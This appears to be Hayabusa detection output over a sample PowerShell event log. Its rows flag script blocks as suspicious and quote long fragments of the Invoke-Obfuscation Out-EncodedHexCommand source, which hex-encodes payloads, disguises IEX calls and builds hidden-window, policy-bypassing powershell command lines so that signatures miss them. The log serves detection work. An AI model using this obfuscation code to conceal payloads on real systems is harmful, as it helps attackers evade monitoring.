-Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. 
$Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. 
